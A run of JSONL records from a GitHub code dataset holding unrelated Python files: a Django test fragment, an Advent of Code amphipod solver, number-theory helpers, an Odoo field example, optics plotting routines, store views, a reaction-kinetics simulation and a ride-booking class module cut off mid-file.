\"United Kingdom\"\n if aml-kyc-citizenship_country == \"United Kingdom\" {\n set uk-aml-kyc-full_name = fields[aml-kyc-full_name]\n set uk-application-share_class = fields[application-share_class]\n set uk-application-vehicle = fields[application-vehicle]\n set uk-applicant-investor_signing_date = fields[applicant-investor_signing_date]\n set uk-aml-kyc-us_person_sign = fields[aml-kyc-us_person_sign]\n set fund-gp_signer_date-uk = fields[fund-gp_signer_date]\n require fund-gp_signer_sign-uk\n require fund-gp_signer_date-uk\n }\n \"\"\"\n fund = application.fund\n fund.document_filter = DocumentFilter.objects.create(code=code, fund=fund)\n fund.save()\n\n subscription_document_service = CreateApplicantAgreementDocument(application=application)\n envelope_args = subscription_document_service.get_envelope_payload(fund_agreement_document=fund_document)\n recipients = DocumentSigningService.get_recipients(envelope_args=envelope_args)\n self.assertIsNotNone(recipients)\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/agreements/tests/test_subscription_documents_envelop_service.py","file_name":"test_subscription_documents_envelop_service.py","file_ext":"py","file_size_in_byte":7088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16689463408","text":"import sys\nimport networkx as nx\nfrom functools import lru_cache\nimport pprint\npprint = pprint.pprint\n\n\ndef read_input(f):\n board = f.read().split('\\n')\n board[3] += ' '\n board[4] += ' '\n board = tuple((tuple(row) for row in board))\n return board\n\n\ndef valid_moves(board):\n moves = []\n columns = {'A': 3, 'B': 5, 'C': 7, 'D': 9}\n point_dict = {'A': 1, 'B': 10, 'C': 100, 'D': 1000}\n for i, let in zip(columns.values(), columns.keys()):\n if board[3][i] not in [let, '.']:\n if board[2][i] == '.':\n cl = board[3][i]\n for j in range(i, 0, -1):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (2 + (i-j)) * point_dict[cl]\n moves.append(((3, i), (1, j)))\n else:\n break\n for j in range(i, 12):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (2 + (j-i)) * point_dict[cl]\n moves.append(((3, i), (1, j)))\n else:\n break\n obstructed = False\n if i > columns[cl]:\n for j in range(columns[cl], i):\n if board[1][j] != '.':\n obstructed = True\n else:\n for j in range(i+1, columns[cl]+1):\n if board[1][j] != '.':\n obstructed = True\n if not obstructed:\n if board[3][columns[cl]] == '.':\n if i > columns[cl]:\n points = (2 + (i-j) + 2) * point_dict[cl]\n else:\n points = (2 + (j-i) + 2) * point_dict[cl]\n moves.append(((3, i), (3, columns[cl])))\n elif board[3][columns[cl]] == cl and board[2][columns[cl]] == '.':\n if i > columns[cl]:\n points = (2 + (i-j) + 1) * point_dict[cl]\n else:\n points = (2 + (j-i) + 1) * point_dict[cl]\n moves.append(((3, i), (2, columns[cl])))\n elif board[2][i] != '.':\n cl = board[2][i]\n for j in range(i, 0, -1):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (1 + (i-j)) * point_dict[cl]\n moves.append(((2, i), (1, j)))\n else:\n break\n for j in range(i, 12):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (1 + (j - i)) * point_dict[cl]\n moves.append(((2, i), (1, j)))\n else:\n break\n obstructed = False\n if i > columns[cl]:\n for j in range(columns[cl], i):\n if board[1][j] != '.':\n obstructed = True\n else:\n for j in range(i+1, columns[cl]+1):\n if board[1][j] != '.':\n obstructed = True\n if not obstructed:\n if board[3][columns[cl]] 
== '.':\n if i > columns[cl]:\n points = (1 + (i-j) + 2) * point_dict[cl]\n else:\n points = (1 + (j-i) + 2) * point_dict[cl]\n moves.append(((2, i), (3, columns[cl])))\n elif board[3][columns[cl]] == cl and board[2][columns[cl]] == '.':\n if i > columns[cl]:\n points = (1 + (i-j) + 1) * point_dict[cl]\n else:\n points = (1 + (j-i) + 1) * point_dict[cl]\n moves.append(((2, i), (2, columns[cl])))\n else:\n if board[2][i] not in [let, '.']:\n cl = board[2][i]\n for j in range(i, 0, -1):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (1 + (i-j)) * point_dict[cl]\n moves.append(((2, i), (1, j)))\n else:\n break\n for j in range(i, 12):\n if j not in columns.values():\n if board[1][j] == '.':\n points = (1 + (j - i)) * point_dict[cl]\n moves.append(((2, i), (1, j)))\n else:\n break\n obstructed = False\n if i > columns[cl]:\n for j in range(columns[cl], i):\n if board[1][j] != '.':\n obstructed = True\n else:\n for j in range(i+1, columns[cl]+1):\n if board[1][j] != '.':\n obstructed = True\n if not obstructed:\n if board[3][columns[cl]] == '.':\n if i > columns[cl]:\n points = (1 + (i-j) + 2) * point_dict[cl]\n else:\n points = (1 + (j-i) + 2) * point_dict[cl]\n moves.append(((2, i), (3, columns[cl])))\n elif board[3][columns[cl]] == cl and board[2][columns[cl]] == '.':\n if i > columns[cl]:\n points = (1 + (i-j) + 1) * point_dict[cl]\n else:\n points = (1 + (j-i) + 1) * point_dict[cl]\n moves.append(((2, i), (2, columns[cl])))\n for i in range(1, 12):\n if board[1][i] != '.':\n let = board[1][i]\n obstructed = False\n if i > columns[let]:\n for j in range(columns[let], i):\n if board[1][j] != '.':\n obstructed = True\n else:\n for j in range(i+1, columns[let]+1):\n if board[1][j] != '.':\n obstructed = True\n if not obstructed:\n if board[3][columns[let]] == '.':\n if i > columns[let]:\n points = ((i-columns[let]) + 2) * point_dict[let]\n else:\n points = ((columns[let]-i) + 2) * point_dict[let]\n moves.append(((1, i), (3, columns[let])))\n elif board[3][columns[let]] == let and board[2][columns[let]] == '.':\n if i > columns[let]:\n points = ((i-columns[let]) + 1) * point_dict[let]\n else:\n points = ((columns[let]-i) + 1) * point_dict[let]\n moves.append(((1, i), (2, columns[let])))\n return moves\n\n\ndef can_move(board, row, col):\n columns = {3: 'A', 5: 'B', 7: 'C', 9: 'D'}\n done = True\n for i in range(5, 1, -1):\n if board[i][col] not in [columns[col], '.']:\n done = False\n if not done:\n can = True\n for i in range(2, row):\n if board[i][col] != '.':\n can = False\n else:\n can = False\n return can\n\n\ndef row1_moves(board, row, col):\n illegal = [3, 5, 7, 9]\n possible = []\n for j in range(col-1, 0, -1):\n if j not in illegal:\n if board[1][j] == '.':\n possible.append(j)\n else:\n break\n for j in range(col+1, 12):\n if j not in illegal:\n if board[1][j] == '.':\n possible.append(j)\n else:\n break\n return possible\n\n\ndef homecol_possible(board, row, col, row1pos=[]):\n if not row1pos:\n row1pos = row1_moves(board, row, col)\n columns = {'A': 3, 'B': 5, 'C': 7, 'D': 9}\n let = board[row][col]\n hc = columns[let]\n allowed = True\n for i in range(5, 1, -1):\n if board[i][hc] not in [let, '.']:\n allowed = False\n break\n if allowed:\n if hc > col:\n if hc-1 not in row1pos and hc-1 != col:\n allowed = False\n elif hc < col:\n if hc+1 not in row1pos and hc+1 != col:\n allowed = False\n if allowed:\n hcrow = None\n for i in range(5, 1, -1):\n if board[i][hc] == '.':\n hcrow = i\n break\n else:\n hcrow = None\n return (hcrow, hc) if hcrow else None\n\n\ndef 
part2_moves(board):\n moves = []\n columns = {'A': 3, 'B': 5, 'C': 7, 'D': 9}\n for col in columns.values():\n for row in range(5, 1, -1):\n if board[row][col] != '.':\n if can_move(board, row, col):\n row1 = row1_moves(board, row, col)\n for c in row1:\n moves.append(((row, col), (1, c)))\n hc = homecol_possible(board, row, col, row1)\n if hc:\n moves.append(((row, col), hc))\n for col in range(1, 12):\n if board[1][col] != '.':\n hc = homecol_possible(board, 1, col)\n if hc:\n moves.append(((1, col), hc))\n return moves\n\n\ndef finished(board):\n columns = {'A': 3, 'B': 5, 'C': 7, 'D': 9}\n fin = True\n for k, v in columns.items():\n if not (board[2][v] == k and board[3][v] == k and board[4][v] == k and board[5][v] == k):\n fin = False\n return fin\n\n\ndef do_move(board, move):\n (i1, j1), (i2, j2) = move\n let = board[i1][j1]\n lboard = [list(row) for row in board]\n lboard[i1][j1] = '.'\n lboard[i2][j2] = let\n return tuple((tuple(row) for row in lboard)), let\n\n\ndef isstate(board, points):\n state = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n ('#', '.', 'A', '.', '.', '.', 'C', '.', 'D', '.', '.', '.', '#'),\n ('#', '#', '#', '.', '#', '.', '#', 'A', '#', 'C', '#', '#', '#'),\n (' ', ' ', '#', '.', '#', 'D', '#', 'B', '#', 'B', '#', ' ', ' '),\n (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\n if board == state:\n return True\n\n\n@lru_cache(maxsize=None)\ndef sim(board, depth=0):\n moves = part2_moves(board)\n if moves:\n for move in moves:\n p1, p2 = move\n new_board, let = do_move(board, (p1, p2))\n added_points = price(p1, p2, let)\n G.add_edge(board, new_board, weight=added_points)\n sim(new_board, depth+1)\n else:\n ended_states.append((depth, board))\n # pprint(board)\n # if finished(board):\n # print(board)\n\n\ndef price(p1, p2, let):\n point_dict = {'A': 1, 'B': 10, 'C': 100, 'D': 1000}\n points = p2[0] - (2 - p1[0]) + abs(p1[1]-p2[1])\n # if p1[0] == 1:\n # points = p2[0] - 1 + abs(p1[1]-p2[1])\n # elif p1[0] == 2:\n # points = p2[0] + abs(p1[1]-p2[1])\n # else:\n # points = p2[0] + 1 + abs(p1[1]-p2[1])\n return points * point_dict[let]\n\n\nended_states = []\n# board = read_input(sys.stdin)\n# pprint(board)\n# board = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n# ('#', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '#'),\n# ('#', '#', '#', 'A', '#', 'D', '#', 'A', '#', 'C', '#', '#', '#'),\n# (' ', ' ', '#', 'D', '#', 'C', '#', 'B', '#', 'A', '#', ' ', ' '),\n# (' ', ' ', '#', 'D', '#', 'B', '#', 'A', '#', 'C', '#', ' ', ' '),\n# (' ', ' ', '#', 'C', '#', 'D', '#', 'B', '#', 'B', '#', ' ', ' '),\n# (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\nboard = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n ('#', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '#'),\n ('#', '#', '#', 'B', '#', 'C', '#', 'B', '#', 'D', '#', '#', '#'),\n (' ', ' ', '#', 'D', '#', 'C', '#', 'B', '#', 'A', '#', ' ', ' '),\n (' ', ' ', '#', 'D', '#', 'B', '#', 'A', '#', 'C', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', 'D', '#', 'C', '#', 'A', '#', ' ', ' '),\n (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\nstate = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n ('#', 'B', 'B', '.', 'D', '.', 'B', '.', 'C', '.', 'D', 'D', '#'),\n ('#', '#', '#', '.', '#', '.', '#', '.', '#', 'C', '#', '#', '#'),\n (' ', ' ', '#', 'A', '#', '.', '#', '.', '#', 'A', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', '.', '#', '.', '#', 'C', '#', ' ', ' 
'),\n (' ', ' ', '#', 'A', '#', 'D', '#', 'C', '#', 'B', '#', ' ', ' '),\n (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\nG = nx.DiGraph()\nsim(board)\nfin = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n ('#', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '#'),\n ('#', '#', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', '#', '#'),\n (' ', ' ', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', ' ', ' '),\n (' ', ' ', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', ' ', ' '),\n (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\n# fin = (('#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#', '#'),\n# ('#', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '.', '#'),\n# ('#', '#', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', '#', '#'),\n# (' ', ' ', '#', 'A', '#', 'B', '#', 'C', '#', 'D', '#', ' ', ' '),\n# (' ', ' ', '#', '#', '#', '#', '#', '#', '#', '#', '#', ' ', ' '))\n# pprint(list(G.nodes))\nlength, path = nx.single_source_dijkstra(G, board, target=fin, weight='weight')\nprint(length)\n# for i, state in enumerate(path):\n# print(i)\n# pprint(state)\n# print(eval('[' + str(sim(board)).replace('[','').replace(']','') + ']'))\n# pprint(ended_boards)\n# pprint(state)\n# pprint(part2_moves(state))\n# pprint(sorted(ended_states, key=lambda x: x[0]))\n","repo_name":"gustavkrist/aoc2021","sub_path":"day23/day23.py","file_name":"day23.py","file_ext":"py","file_size_in_byte":14387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35492208285","text":"from fractions import Fraction\nimport math\n\ndef gcd( x, *xs ):\n try:\n it = iter( x )\n g = next( it )\n for y in it:\n g = math.gcd( g, y )\n except TypeError:\n g = x\n\n for y in xs:\n g = math.gcd( g, y )\n\n return g\n\ndef lcm(a, b):\n return a * b // math.gcd(a, b)\n\ndef modinv(a, m):\n g, x, y = xgcd(a, m)\n if g != 1:\n return None # modular inverse does not exist\n else:\n return x % m\n\ndef xgcd(a, b):\n \"\"\" Returns triplet g, x, y such that ax + by = g = gcd(a, b)\n Taken from: http://en.wikibooks.org/wiki/Algorithm_Implementation/Mathematics/Extended_Euclidean_algorithm\n \"\"\"\n x,y, u,v = 0,1, 1,0\n while a != 0:\n q, r = b//a, b%a\n m, n = x-u*q, y-v*q\n b,a, x,y, u,v = a,r, u,v, m,n\n _gcd = b\n return _gcd, x, y\n\ndef crt2( n1, a1, n2, a2 ):\n \"\"\" Computes the solution to the 2 simultaneous congruence relations:\n\n x = a1 (mod n1)\n x = a2 (mod n2)\n \"\"\"\n g = math.gcd( n1, n2 )\n delta = a2 - a1\n if delta % g != 0:\n raise ArithmeticError(\"No solution\")\n\n delta = delta // g\n inv = mul_inv( n1 // g, n2 // g )\n modulus = (n1 // g) * n2\n return modulus, (a1 + n1 * inv * delta) % modulus\n\ndef chinese_remainder(n, a):\n \"\"\" Computes the solution of a system of congruence relations, given by n and a\n\n n: list of moduli\n a: list of remainders\n\n \"\"\"\n tups = iter(zip(n, a))\n n1, a1 = next(tups)\n for n2, a2 in tups:\n n1, a1 = crt2( n1, a1, n2, a2 )\n\n return n1, a1\n \ndef mul_inv(a, b):\n b0 = b\n x0, x1 = 0, 1\n if b == 1: return 1\n while a > 1:\n q = a // b\n a, b = b, a%b\n x0, x1 = x1 - q * x0, x0\n if x1 < 0: x1 += b0\n return x1\n\n\ndef max_mods(a1, b1, m1, a2, b2, m2):\n \"\"\" Computes the maximum of the sum of:\n \n (a1 + b1 * x) mod m1 + (a2 + b2 * x) mod m2,\n \n taken over all possible integer values of x\n \"\"\"\n values1 = m1 // gcd( b1, m1 )\n values2 = m2 // gcd( b2, m2 )\n count = 
lcm( values1, values2 )\r\n max_v = -1, 0, 0\r\n arg_max = None\r\n for i in range(2 * count):\r\n v1 = (a1 + b1 * i) % m1\r\n v2 = (a2 + b2 * i) % m2\r\n v = v1 + v2\r\n if v > max_v[0]:\r\n max_v = v, v1, v2\r\n arg_max = i\r\n \r\n print(\"Max value = {}, attained at x = {}\".format(max_v[0], arg_max))\r\n print(\"Value: {} + {}\".format( max_v[1], max_v[2] ))\r\n","repo_name":"robertdeg/sdfpy","sub_path":"sdfpy/integers.py","file_name":"integers.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"39398478383","text":"from odoo import fields, models\n\n\nclass Fields(models.Model):\n _inherit = '_tu_helper.field'\n\n field_image = fields.Image(string='Image',\n max_width=1920,\n max_height=720,\n verify_resolution=True,\n attachment=True,\n help='This is Image field')\n\n\n # max_width - the maximum width of the image (default: 0, no limit)\n\n # max_height - the maximum height of the image (default: 0, no limit)\n\n # If the image is larger than these dimensions, it is automatically compressed to fit them\n # On the form it appears as a thumbnail of the uploaded image with edit and delete buttons\n\n # verify_resolution - whether the image resolution should be verified to ensure it doesn’t go over the maximum image resolution (default: True)\n\n # attachment - whether the field should be stored as ir_attachment or in a column of the model’s table (default: True).\n\n # help - tooltip shown when the user hovers over the field\n\n\n","repo_name":"ikuchmar/OdooDev","sub_path":"_tu_helper/_Wiki/_Odoo/Dev Docs/Fields/Fields_Advanced/field_image.py","file_name":"field_image.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35901908846","text":"from objects import Field,Field1D,Field2D,Geometry,Mode,modal_decomposition\nimport matplotlib.pyplot as plt\nimport numpy as np\nPI=np.pi\ndef plot_intensity(field:Field2D,**kwargs):\n \"\"\"\n Intensity plot of a 2D field profile\n \"\"\"\n plt.xlabel(r\"x [$\\mu m$]\");plt.ylabel(r\"y [$\\mu m$]\")\n plt.imshow(field.intensity,cmap='jet',origin='lower', \\\n extent=[-field.geometry.xmax,field.geometry.xmax,-field.geometry.xmax,field.geometry.xmax],**kwargs)\n plt.colorbar()\n\ndef plot_mirr(e_mirr:Field1D,e_0:Mode):\n\n geometry=e_mirr.geometry\n mask = abs(geometry.x)<=geometry.xmax\n phase_avg,phase_rms=e_mirr.phase_moments()\n e_phase_shifted = e_mirr.phase_shift()\n e_expected = e_0.field_profile(geometry.L)\n\n if e_0.paraxial:\n paraxial='paraxial'\n else:\n paraxial='non-paraxial'\n if e_0.l!=0:\n e_mirr.phase_rectified[0] = 0 # assignment; the original '==' was a no-op comparison\n\n fig,axs = plt.subplots(2,1,sharex=True)\n fig.subplots_adjust(wspace=0.3)\n plt.xlabel(r\"x [$\\mu m$]\")\n fig.suptitle(f\"Phase shifted field on the mirror surface \\n ({paraxial} propagation of {e_0.l}{e_0.p} mode) \\n \\\n Average phase = {phase_avg:.4f}, RMS phase = {phase_rms:.4f}\\n \\\n Paraxial phase = {e_0.get_gouy(geometry.L):.4f}\\n \\\n 1/(8k(Rm-L))={1/(8*geometry.k*(geometry.Rm-geometry.L)):.5f}, L={geometry.L}, Rm={geometry.Rm}\",fontsize=10) # moved to the figure title so the panel label below does not overwrite it\n axs[0].set_title(\"(a)\")\n axs[0].set_ylabel(r\"$\\psi [V \\mu m^{-1}]$\")\n 
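# overlay the real and imaginary parts (and 10x imaginary) and the magnitude of the shifted field, plus the exact paraxial profile\n    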
axs[0].plot(abs(geometry.x[mask]),(e_phase_shifted.real[mask]),'.',label=r'Re[$\\psi$]')\n axs[0].plot(abs(geometry.x[mask]),(e_phase_shifted.imag[mask]),':',label=r'Im[$\\psi$]')\n axs[0].plot(abs(geometry.x[mask]),(10*e_phase_shifted.imag[mask]),color='orange',label=r'10*Im[$\\psi$]')\n axs[0].plot(abs(geometry.x[mask]),e_phase_shifted.abs[mask],'.',color='green',markersize=2,label=r'$|\\psi|$')\n axs[0].plot(abs(geometry.x[mask]),e_expected.cross_section().abs[mask],'k--',label='Exact paraxial result',alpha=0.75)\n axs[0].legend(fontsize=8)\n\n axs[1].set_title(fr\"Phase profile\",fontsize=10)\n axs[1].set_ylabel(r'Arg $\\psi$ [rad]')\n axs[1].plot(abs(geometry.x[mask]),e_phase_shifted.phase_rectified[mask],'r')\n\n plt.legend(loc=1)\n plt.show()\n\ndef plot_plane(psi_e:Field1D,e_0:Mode):\n \"\"\"\n Phase plot of the field propagation to z=L.\n \"\"\"\n geometry=psi_e.geometry\n mask = (abs(geometry.x)<=geometry.xmax)\n e_phase = psi_e.phase_rectified\n phase_avg,phase_rms=psi_e.phase_moments()\n if e_0.paraxial:\n paraxial='paraxial'\n else:\n paraxial='non-paraxial'\n gouy = e_0.get_gouy(geometry.L)\n \n plt.title(r\"Corrected phase of slowly-varying field at z=L plane\"+\"\\n\" +f\"({paraxial} propagation of {e_0.l}{e_0.p})\" +\"\\n\"+ \\\n f\"Average phase = {phase_avg:.4f}, RMS phase = {phase_rms:.4f}\"+\"\\n\"+\\\n f\"Paraxial phase = {gouy:.4f}\" \"\\n\"+ \\\n f\"1/(8k(Rm-L)={1/(8*geometry.k*(geometry.Rm-geometry.L)):.5f}, L={geometry.L}, Rm={geometry.Rm}\",fontsize=10)\n plt.xlabel(r'$x \\;[\\mu m]$')\n plt.ylabel(r\"$Arg \\psi \\;[rad]$\")\n plt.plot(abs(geometry.x[mask]),e_phase[mask])#,label=r'$\\psi(z=L)\\cdot \\exp(ik\\Delta z)$')\n plt.axhline(gouy,xmin=min(abs(geometry.x)),xmax=geometry.xmax,ls='--',color='r',label=f'Paraxial phase {gouy:.4f}')\n plt.axhline(phase_avg,xmin=min(abs(geometry.x)),xmax=geometry.xmax,ls='--',color='k',label=rf'Average phase: {phase_avg:.4f}')\n plt.legend()\n plt.savefig(f\"Figures/paraxial{geometry.Rm}_fullx.pdf\",bbox_inches=\"tight\")\n plt.show()\n\ndef plot_decomposition(psi_e_mirr:Field1D,Psi_0:Mode):\n\n psi_e_mirr=psi_e_mirr.phase_shift()\n geometry=psi_e_mirr.geometry\n ps,alphas,e_decomposed = modal_decomposition(psi_e_mirr,Psi_0)\n\n l=Psi_0.l;p=Psi_0.p\n title_string=\"Modal decomposition of the phase shifted field at the curved mirror \\n\"\n for i in range(len(alphas)):\n if i == len(alphas)-1:\n title_string+=f\"{abs(alphas[i])**2:.4f}\"+rf\"LG$_{l}$$_{ps[i]}$\"\n else:\n title_string+=f\"{abs(alphas[i])**2:.4f}\"+rf\"LG$_{l}$$_{ps[i]}$+\"\n title_string+=f\"\\n {l}{p} mode at z=0\"\n plt.figure()\n plt.title(title_string)\n plt.xlabel(r\"x [$\\mu m$]\");plt.ylabel(r\"Abs(field) [$V\\mu m^{-1}$]\")\n plt.plot(abs(geometry.x),psi_e_mirr.abs,'.',label=r\"$\\psi_{mirr}$\")\n plt.plot(abs(geometry.x),e_decomposed[0].abs,'r',alpha=0.75,label=\"Decomposed field\")\n plt.legend()\n plt.show()","repo_name":"darstar/resonant_optical_microcavities","sub_path":"plot_routines.py","file_name":"plot_routines.py","file_ext":"py","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31691854294","text":"from django.shortcuts import render\n\nfrom django.views.generic import ListView, DetailView, TemplateView\n\n# product models\nfrom store.models import Category, Product, ProductImages, Banner\n\n\nclass HomeListView(TemplateView):\n def get(self, request, *args, **kwargs):\n products = Product.objects.all().order_by('-id')\n banners = 
Banner.objects.filter(is_active=True).order_by('-id')[0:3]\n\n context = {\n 'products': products,\n 'banners': banners\n }\n return render(request, 'store/index.html', context)\n\n def post(self, request, *args, **kwargs):\n if request.method == 'post' or request.method == 'POST':\n search_product = request.POST.get('search_product')\n products = Product.objects.filter(name__icontains=search_product).order_by('-id')\n\n context = {\n 'products': products\n }\n return render(request, 'store/index.html', context)\n\n\n\nclass ProductDetailView(DetailView):\n model = Product\n template_name = 'store/product.html'\n context_object_name = 'item'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n context['product_images'] = ProductImages.objects.filter(product=self.object.id)\n return context\n\n\n # item.get_product_url\n\n# def product_details(request, pk):\n# item = Product.objects.get(id=pk)\n# photos = ProductImages.objects.filter(product=item).order_by('-created')\n# context = {\n# 'item': item,\n# 'photos': photos,\n# }\n# return render(request, 'store/product.html', context)\n\n","repo_name":"alfinarif/ecommerce-application-v2","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1636,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19854864417","text":"import math\nimport matplotlib.pyplot as plt\nfrom ChemData import ChemData\n\ngA = 250\ngB = 250\ngC = 0\ngD = 50\n\nngA = gA\nngB = gB * .7\nngC = 0\nngD = gD + (gB * .3)\n\nmolesA = ngA / ChemData[\"Formic Acid\"][\"MW\"]\nmolesB = ngB / ChemData[\"70% H2O2\"][\"MW\"]\nmolesC = ngC / ChemData[\"Peraformic Acid\"][\"MW\"]\nmolesD = ngD / ChemData[\"Water\"][\"MW\"]\n\nvolume = (gA * ChemData[\"Formic Acid\"][\"DEN\"] + gB * ChemData[\"70% H2O2\"][\"DEN\"] + gC *\n ChemData[\"Peraformic Acid\"][\"DEN\"] + gD * ChemData[\"Water\"][\"DEN\"]) / 1000\nprint(volume)\n\nMA = molesA / volume\nMB = molesB / volume\nMC = molesC / volume\nMD = molesD / volume\n\nminutes = 500\ns_conA = MA\ns_conB = MB\ns_conC = MC\ns_conD = MD\ncat_con = 0\ntemperature = 325\nk1 = (1.20 * 10 ** -3) * math.exp((-55304 / 8.314) * (1 / temperature - 1 / 323))\nk2 = (1.60 * 10 ** -4) * math.exp((-105073 / 8.314) * (1 / temperature - 1 / 323))\nKe = 1.60 * math.exp((-10000 / 8.314) * (1 / 298 - 1 / temperature))\n\nconA = s_conA\nconB = s_conB\nconC = s_conC\nconD = s_conD\nseconds = 1\ncon_A = [conA]\ncon_B = [conB]\ncon_C = [conC]\ncon_D = [conD]\nwatts_list = [0]\nenergy = 0\nH_concentration = math.sqrt(s_conA * (1.8 * 10 ** -4))\n\ndecomp_enthalpy = -100000\nstd_enthalpy = -4840\nrxn_enthalpy = std_enthalpy + (((ChemData[\"Peracetic Acid\"][\"Cp\"] + ChemData[\"Water\"][\"Cp\"]) - (\n ChemData[\"70% H2O2\"][\"Cp\"] + ChemData[\"Glacial Acetic Acid\"][\"Cp\"])) * (temperature - 298.15))\n\nwhile seconds < minutes * 60:\n rate1 = (k1 * conA * conB * H_concentration) * (1 - (((conC * conD) / (conA * conB)) * (1 / Ke)))\n rate2 = (k2 * conC)\n conA = conA - rate1\n conB = conB - rate1\n conC = conC + rate1 - rate2\n conD = conD + rate1 + rate2\n con_A.append(conA), con_B.append(conB), con_C.append(conC), con_D.append(conD)\n keq = (conC * conD) / (conA * conB)\n moles_PfA_Formed = rate1 * volume\n moles_PFA_Decomp = rate2 * volume\n energy = energy + (rxn_enthalpy * molesC)\n watts = ((moles_PfA_Formed * rxn_enthalpy) + (moles_PFA_Decomp * decomp_enthalpy)) * -1\n watts_list.append(watts)\n print(seconds, conC)\n seconds += 1\n\ndef 
plot_conc():\n plt.figure(\"Concentration\")\n plt.xlabel(\"Time (seconds)\")\n plt.ylabel(\"Concentration (mol/L)\")\n plt.xlim(0, minutes * 60), plt.ylim(0, 8)\n plt.plot(con_A), plt.plot(con_B), plt.plot(con_C), plt.plot(con_D)\n plt.show()\n\ndef plot_watts():\n plt.figure(\"Reaction Watts\")\n plt.xlabel(\"Time (seconds)\")\n plt.ylabel(\"Watts\")\n plt.xlim(0, minutes * 60), plt.ylim(0, max(watts_list) * 1.1)\n plt.plot(watts_list)\n plt.show()\n\n\nplot_conc()\n","repo_name":"akarl2/Monte_Karlo","sub_path":"PFA_Seconds.py","file_name":"PFA_Seconds.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39684358197","text":"import math\n\n\nclass Places:\n _locationsMap = {\"Los-Angeles\": (5.3, 2.7),\n \"San-Jose\": (3.9, 5.0),\n \"San-Francisco\": (7, 5),\n \"Fremont\": (10, 6.9),\n \"Santa-Clara\": (16.7, 6.8)\n }\n\n def __init__(self, _locationsMap):\n self._locationsMap = _locationsMap\n\n def getLocation(self, locationName: str) -> tuple:\n return self._locationsMap[locationName]\n\n def isLocationPresent(self, locationName: str) -> bool:\n return locationName in self._locationsMap\n\n def getDistance(self, location1: tuple, location2: tuple) -> int:\n location1 = self._locationsMap[location1]\n location2 = self._locationsMap[location2]\n\n distance = math.sqrt(\n (location1[0] - location2[0])**2 + (location1[1] - location2[1])**2)\n return math.ceil(distance)\n\n\nclass RideClient:\n _id = 0\n\n __slots__ = [\"customerName\", \"customerEmail\", \"id\"]\n\n def __init__(self, customerName):\n self.customerName = customerName\n self.customerEmail = \"\"\n self.id = RideClient._id\n RideClient._id += 1\n\n\nclass InitiateBookingRequest:\n _id = 0\n\n __slots__ = [\"id\", \"customerId\", \"customerName\",\n \"customerEmail\", \"pickUpLocation\", \"dropOffLocation\", \"distance\", \"assignedDriver\"]\n\n def __init__(self):\n self.id = None\n self.customerId = None\n self.customerName = None\n self.customerEmail = None\n self.pickUpLocation = \"\"\n self.dropOffLocation = \"\"\n self.distance = 0\n self.assignedDriver = None\n\n @staticmethod\n def create():\n bookingRequest = InitiateBookingRequest()\n bookingRequest.id = InitiateBookingRequest._id\n InitiateBookingRequest._id += 1\n return bookingRequest\n\n\nclass RideBookingOrder:\n _id = 0\n\n __slots__ = [\"id\", \"customerId\", \"customerName\",\n \"customerEmail\", \"pickUpLocation\", \"dropOffLocation\", \"distance\", \"price\", \"tax\", \"assignedDriver\"]\n\n def __init__(self):\n self.id = None\n self.customerId = None\n self.customerName = None\n self.customerEmail = None\n self.pickUpLocation = \"\"\n self.dropOffLocation = \"\"\n self.distance = 0\n self.price = 0.00\n self.tax = 0.00\n self.assignedDriver = None\n\n @staticmethod\n def create():\n bookingOrder = RideBookingOrder()\n bookingOrder.id = RideBookingOrder._id\n RideBookingOrder._id += 1\n return bookingOrder\n\n\nclass CustomerBill:\n\n __slots__ = [\"id\", \"customerId\", \"customerName\",\n \"customerEmail\", \"pickUpLocation\", \"dropOffLocation\", \"distance\", \"assignedDriver\", \"price\", \"tax\", \"totalCost\"]\n\n def __init__(self):\n self.customerId = 